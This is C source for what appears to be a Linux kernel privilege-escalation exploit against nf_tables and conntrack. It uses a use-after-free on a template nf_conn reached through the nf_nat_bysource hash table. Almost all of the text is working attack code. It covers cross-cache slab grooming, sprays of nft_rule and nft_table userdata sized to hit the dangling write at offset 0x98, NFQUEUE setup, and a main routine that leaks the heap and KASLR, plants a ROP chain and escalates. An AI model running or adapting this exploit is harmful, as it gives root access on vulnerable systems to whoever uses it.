// target nf_conn — lands on a freshly opened slab.
void spray_cross_cache_pre_alloc() {
    int idx;
    // 1. DEFRAG kmalloc-256
    for (idx = 0; idx < CROSS_CACHE_DEFRAGMENTATION_SIZE; idx++)
        spray_cross_cache_defragment[idx] = alloc_nf_conn();
    // 2. pre pre allocate
    for (idx = 0; idx < CROSS_CACHE_PRE_PRE_SIZE; idx++)
        spray_cross_cache_pre_pre[idx] = alloc_nf_conn();
    // 3. pre allocate
    for (idx = 0; idx < CROSS_CACHE_PRE_SIZE; idx++)
        spray_cross_cache_pre[idx] = alloc_nf_conn();
}
// alloc target between spray_cross_cache_pre_alloc() and spray_cross_cache_post_alloc()
// Second half of the grooming, run after the target nf_conn is allocated:
// finish the target's slab (post) and fill more slabs (post-post) so the
// later frees push whole slabs back to the page allocator.
void spray_cross_cache_post_alloc() {
    int idx;
    // 5. post allocate
    for (idx = 0; idx < CROSS_CACHE_POST_SIZE; idx++)
        spray_cross_cache_post[idx] = alloc_nf_conn();
    // 6. post post allocate
    for (idx = 0; idx < CROSS_CACHE_POST_POST_SIZE; idx++)
        spray_cross_cache_post_post[idx] = alloc_nf_conn();
}
// Free the pre-pre and pre groups (NF_DROP releases each packet's nf_conn)
// before the target is freed, emptying the slabs around the target's slab.
void cross_cache_pre_free() {
    int idx;
    // 7. pre pre free
    for (idx = 0; idx < CROSS_CACHE_PRE_PRE_SIZE; idx++)
        nfq_send_verdict(QUEUE_NUM, spray_cross_cache_pre_pre[idx], NF_DROP);
    // 8. pre free
    for (idx = 0; idx < CROSS_CACHE_PRE_SIZE; idx++)
        nfq_send_verdict(QUEUE_NUM, spray_cross_cache_pre[idx], NF_DROP);
}
// free target between cross_cache_pre_free() and cross_cache_post_free()
// Free the post and post-post groups after the target is freed, so the
// target's now-empty slab is returned to the page allocator and can be
// reclaimed by a different cache (kmalloc-cg-256).
void cross_cache_post_free() {
    int idx;
    // 9. post free
    for (idx = 0; idx < CROSS_CACHE_POST_SIZE; idx++)
        nfq_send_verdict(QUEUE_NUM, spray_cross_cache_post[idx], NF_DROP);
    // 11. post post free
    for (idx = 0; idx < CROSS_CACHE_POST_POST_SIZE; idx++)
        nfq_send_verdict(QUEUE_NUM, spray_cross_cache_post_post[idx], NF_DROP);
}
// Spray nft_rules sized to exactly SLAB_CHUNK_SIZE_256 so they reclaim the
// page freed by the first cross-cache. Each rule carries 13 notrack
// expressions as padding plus one nft_log expression, positioning
// nft_log.prefix at chunk offset 0x98 — the exact offset of the dangling
// nf_nat_bysource UAF write.
// Returns 0 on success, -1 on a failed batch commit.
int spray_nft_rule_kmalloc_cg_256() {
const int number_of_exprs = NUMBER_OF_NOTRACK_EXPRS + 1; // + 1 for nft_log expression
// Size the userdata so rule header + exprs + log private data + userdata
// header add up to exactly one kmalloc-256 chunk.
int udata_size = SLAB_CHUNK_SIZE_256; // craft a rule in cache 256
udata_size -= NFT_RULE_SIZE;
udata_size -= NFT_EXPR_SIZE * number_of_exprs; // this rule contains NUMBER_OF_NOTRACK_EXPRS expressions, notrack expression doesn't have private data.
udata_size -= NFT_LOG_SIZE; // nft_log expression has private data
udata_size -= sizeof(struct nft_userdata);
char udata[udata_size];
memset(udata, 0, udata_size);
expr list_e[number_of_exprs];
// notrack exprs are used as padding for nft_log
for (int i = 0; i < NUMBER_OF_NOTRACK_EXPRS; i++) {
list_e[i] = make_notrack_expr();
}
expr e_log = make_log_expr(NULL);
list_e[number_of_exprs - 1] = e_log; // nft_log.prefix field is located at offset 0x98 of nft_rule. It matches the offset of the uaf write.
rule r = make_rule(table_spray_name, chain_spray_name, list_e, ARRAY_SIZE(list_e), udata, sizeof(udata), 0);
for (int i = 0; i < SPRAY_BATCHES; i++) {
batch b = batch_init(BATCH_BUFFER_SIZE);
for (int j = 0; j < SPRAY_BATCH_SIZE; j++) {
batch_new_rule(b, r, family);
}
if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
return -1;
}
return 0;
}
// Open the nf_tables netlink socket and install all the plumbing: base table,
// vulnerable chains, NAT chain, the conditional NFQUEUE points (whose
// priorities slot them before/after NAT and conntrack confirm), and the spray
// chain. Returns 0 on success, -1 if the netlink socket cannot be opened.
int setup_netfilter() {
INFO("Creating netfilter netlink socket");
if ((nlsock = mnl_socket_open(NETLINK_NETFILTER)) == NULL) {
ERROR("mnl_socket_open(): nlsock");
return -1;
}
if (mnl_socket_bind(nlsock, 0, MNL_SOCKET_AUTOPID) < 0) {
ERROR("mnl_socket_bind");
return -1;
}
setup_nf_queue();
setup_nft_base_table();
vuln_setup();
// "before_nat_chain" queue point blocks spray packets entering base NAT chain while keeping them alive.
register_conditional_queue_point("before_nat_chain", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC - 1, SIGNAL_SPRAY);
register_base_nat_chain();
// The "nf_conn_queue_point_*" queue point queues two sk_buffs with temporary template nf_conns used to interact with the vulnerability.
// Three consecutive priorities let the same packet be re-queued as it is
// released step by step (accept at point 1 -> caught at point 2, etc.).
register_conditional_queue_point("nf_conn_queue_point_1", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 1, SIGNAL_TMP_TMPL_NF_CONN);
register_conditional_queue_point("nf_conn_queue_point_2", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 2, SIGNAL_TMP_TMPL_NF_CONN);
register_conditional_queue_point("nf_conn_queue_point_3", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 3, SIGNAL_TMP_TMPL_NF_CONN);
// "after_nf_confirm" queue point is used to keep the sk_buff with percpu template nf_conn of nft_ct_zone_eval() alive, allows us to use the temporary nf_conn of nft_ct_zone_eval().
// Note: We can't queue a sk_buff containing an unconfirmed nf_conn with refcount greater than 1, read nf_ct_drop_unconfirmed().
// Register this queue point after `nf_confirm()` function.
register_conditional_queue_point("after_nf_confirm", NF_INET_PRE_ROUTING, NF_IP_PRI_FIRST, SIGNAL_PERCPU_TMPL_NF_CONN);
setup_chain_to_spray_nft_rule();
return 0;
}
// Exploit orchestration. Every step's ORDER is load-bearing:
//  1. save userland state, enter user+net ns, install nf_tables plumbing;
//  2. cross-cache #1: freed nf_conn page reclaimed by nft_rules (leak setup);
//  3. cross-cache #2: freed nf_conn reclaimed by forged nft_table udata;
//  4. leak heap + KASLR, plant ROP in the adjacent rule, hijack ops, trigger.
int main() {
save_state();
if (setup() == -1)
return -1;
setup_netfilter();
send_udp_packet(SIGNAL_PERCPU_TMPL_NF_CONN); // attach per-cpu template nf_conn to this packet
queue_recv(NULL); // recv the packet from "after_nf_confirm" queue point. Keeping this packet alive keeps the per-CPU template busy, allowing us to use a temporary template nf_conn.
INFO("I: CROSS CACHE: kmalloc-256 (struct nf_conn) -> kmalloc-cg-256 (struct nft_rule)");
spray_cross_cache_pre_alloc();
INFO("Allocate the first template nf_conn + link it to nf_nat_bysource");
send_udp_packet(SIGNAL_TMP_TMPL_NF_CONN); // attach temporary template nf_conn to this packet
packet_id_first_nf_conn = queue_recv(queue_get_id_cb); // recv the packet from "nf_conn_queue_point_1" queue point
spray_cross_cache_post_alloc();
cross_cache_pre_free();
INFO("Drop the packet with the first template nf_conn, leaving a dangling pointer in nf_nat_bysource hash table");
nfq_send_verdict(QUEUE_NUM, packet_id_first_nf_conn, NF_DROP);
cross_cache_post_free();
INFO("Reclaim the first template nf_conn (kmalloc-256) with nft_rule (kmalloc-cg-256)");
spray_nft_rule_kmalloc_cg_256();
INFO("I: end CROSS CACHE");
INFO("II: CROSS CACHE: kmalloc-256 (nf_conn) -> kmalloc-cg-256 (nft_tables->udata)");
spray_cross_cache_pre_alloc();
INFO("Allocate second template nf_conn + link it to nf_nat_bysource => trigger uaf write");
send_udp_packet(SIGNAL_TMP_TMPL_NF_CONN);
packet_id_second_nf_conn = queue_recv(queue_get_id_cb); // recv the packet from "nf_conn_queue_point_1" queue point
leak_heap_first_tmpl_nf_conn();
spray_cross_cache_post_alloc();
cross_cache_pre_free();
// Deleting the nft_rule triggers nft_log_destroy(), which frees nft_log.prefix, currently pointing to the middle of the second template nf_conn.
INFO("Free nft_rule => free second template nf_conn");
del_target_rule(rule_handle_first_nf_conn);
// @sleep(kernel_func="nft_commit_release",
// desc="wait for victim rule to be freed")
usleep(100 * 1000);
INFO("Reclaim freed nft_rule (kmalloc-cg-256) with nft_table.udata (kmalloc-cg-256)");
spray_nft_tables_udata_kmalloc_cg_256_fake_ext();
cross_cache_post_free();
INFO("Reclaim the second template nf_conn (kmalloc-256) with nft_table.udata (kmalloc-cg-256)");
spray_nft_tables_udata_kmalloc_cg_256_fake_nf_conn();
INFO("II: end CROSS CACHE");
leak_kaslr();
update_adjacent_nft_rule_udata_with_ROP();
update_labels_to_overwrites_ops();
escalate();
return 0;
}